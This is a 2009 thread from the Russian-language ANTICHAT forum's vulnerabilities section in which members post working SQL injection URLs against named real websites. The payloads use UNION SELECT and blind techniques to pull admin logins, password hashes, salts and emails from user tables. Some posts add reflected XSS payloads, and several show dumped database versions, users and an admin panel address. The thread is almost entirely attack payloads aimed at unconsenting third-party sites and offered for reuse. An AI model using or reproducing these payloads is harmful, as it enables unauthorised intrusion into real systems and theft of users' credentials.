HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 10.07.2009, 17:46
Snap
Познающий
Регистрация: 05.02.2007
Сообщений: 71
Провел на форуме:
423288

Репутация: 82
Отправить сообщение для Snap с помощью ICQ
По умолчанию

http://avtodeti.ru
Портал о безопасности детей на дорогах

Цитата:
http://avtodeti.ru/?t=-73+union+select+1,2,concat(login,char(58),password ),4,5,6,7,8,9,10,11+from+admin--
==========

Цитата:
http://avtodeti.ru/?t=-73+union+select+1,2,concat(memberName,char(58),pas swd,char(58),passwordSalt,char(58),emailAddress),4 ,5,6,7,8,9,10,11+from+smf_members+limit+0,1--

Последний раз редактировалось jokester; 10.07.2009 в 18:39.. Причина: правила читаем
 
Ответить с цитированием

  #2  
Старый 10.07.2009, 17:54
beerhack
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
Провел на форуме:
3395070

Репутация: 173
По умолчанию

PR 5
Код:
http://www.irs-net.de/kontakt/mitarbeiter.php?id=1+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,unhex(hex(concat_ws(0x3a,user,password))),17,18,19,20,21+from+mysql.user+limit+0,1/*
Database Version: 4.1.11-log
Database name: web
User name: root@www5.shuttle.de
 
Ответить с цитированием

  #3  
Старый 10.07.2009, 21:03
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

PR 5
Код:
http://www.digitallyobsessed.com/displaypr.php?ID=-608+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,version(),27,28,29,30,31,32,33,34,35,36+from+users--
Database Version: 5.0.81-community
Database name: bobftp_obsessed
User name: bobftp_king@localhost
 
Ответить с цитированием

  #4  
Старый 10.07.2009, 22:54
RazyKK
Познающий
Регистрация: 09.02.2009
Сообщений: 70
Провел на форуме:
393885

Репутация: 34
По умолчанию

http://www.belsoft.ru/index.php?cont=prices&page=a&dob=2&id=21085+limit+ 0+UNION+SELECT+1,2,3,4,5,6,7,CONCAT(Version(),Data base(),User()),9,10,11--

Database Version: 5.0.67-log
Database name: u158438
User name: u158438@10.10.10.212

http://www.belsoft.ru/index.php?cont=prices&page=a&dob=2&id=21085+limit+ 0+UNION+SELECT+CONCAT((SELECT+CONCAT(converge_id,c onverge_pass_hash,converge_pass_salt)+FROM+u158438 .ibf_members_converge+LIMIT+2,1)),2,3,4,5,6,7,8,9, 10,11--

админка
http://www.belsoft.ru/forum/admin.php
 
Ответить с цитированием

  #5  
Старый 11.07.2009, 08:36
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://ru.tv-mis.com/titul.php?id=1+and+substring(version(),1,1)=5

ЗЫ еще xss Напишу

http://ru.tv-mis.com./titul.php?id=%20%3E%3Cscript%3Ealert(/Hi/)%3C/script%3E =)

####################################

http://www.kokomansion.tv/showvideos.php?id=-1+union+select+1,concat(0x3a,user(),version(),data base()),3,4,5,6,7,8,9--

kokouser@localhost5.0.45kokomansiondb

ЗЫ еще xss Напишу

http://www.kokomansion.tv/showvideos.php?id=%3E%3Cscript%3Ealert(/Hi/)%3C/script%3E

####################################
http://www.oreol.tv/services/channel.php?id=1+and+substring(version(),1,1)=5--

Последний раз редактировалось HAXTA4OK; 11.07.2009 в 09:04..
 
Ответить с цитированием

  #6  
Старый 11.07.2009, 13:53
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429

Репутация: 468


Отправить сообщение для Krist_ALL с помощью ICQ
По умолчанию

http://www.gtbike.ru/articles.php?menu_id=38&razd_id=0&pg=1&id=-60+union+select+1,2,3,version(),5,6,7,8,9 PR 4

Последний раз редактировалось jokester; 11.07.2009 в 16:06.. Причина: tetis-pro.ru БОЯН
 
Ответить с цитированием

  #7  
Старый 11.07.2009, 19:23
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429

Репутация: 468


Отправить сообщение для Krist_ALL с помощью ICQ
По умолчанию

http://www.radioworld.ca/information.php?info_id=-45+union+select+1,2,3+from+admin+--
4я версия
 
Ответить с цитированием

  #8  
Старый 11.07.2009, 20:40
InFlame
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме:
810079

Репутация: 90
По умолчанию

db_info:
http://snt-nmu.kiev.ua/?l=ukr&p=scientific_groups&group=-10'+union+select+1,2,3,4,concat_ws(0x0b,version(), user(),database()),6,7--+
Цитата:
5.0.32-Debian_7etch8
snt-nmu@localhost
snt-nmu
tables:
http://snt-nmu.kiev.ua/?l=ukr&p=scientific_groups&group=-10'+union+select+1,2,3,4,group_concat(0x0b,column_ name),6,7+from+information_schema.columns+where+ta ble_name=0x7373735f70616e656c--+
Цитата:
id,
u_f_ukr,
u_i_ukr,
u_o_ukr,
u_f_rus,
u_i_rus,
u_o_rus,
u_f_en,
u_i_en,
u_login,
u_password,
u_session,
u_putdate,
u_number,
u_foto,
u_post_ukr,
u_post_rus,
u_post_en,
u_faculty,
u_entered_year,
u_group,
u_hobby_group,
u_about_sw,
u_home_address,
u_home_phone,
u_mobile_phone,
u_email,
u_icq,
u_url,
u_birthday,
u_sex,
u_date,
u_last_update,
u_ip,
u_graduated,
u_council,
u_order
ЗЫ: сайт на одном сервере с "инъектором" (inj3ct0r.com)
 
Ответить с цитированием

  #9  
Старый 12.07.2009, 01:34
RazyKK
Познающий
Регистрация: 09.02.2009
Сообщений: 70
Провел на форуме:
393885

Репутация: 34
По умолчанию

blind

http://www.hopewell-precision.com/product.php?prod_id=5+AND+ascii(lower(substring(da tabase(),1,1)))>1

stan12187@localhost
stan121871
5.1.22-log
 
Ответить с цитированием

  #10  
Старый 12.07.2009, 02:02
nemaniak
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919

Репутация: 229
По умолчанию

blind PR4

http://www.pollanetsquad.it/attore.asp?cod_att=2150+and+ascii(substring((conca t_ws(char(58),user(),database(),version())),1,1))> 1

Sql135947@%:Sql135947_1:5.0.68-log
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ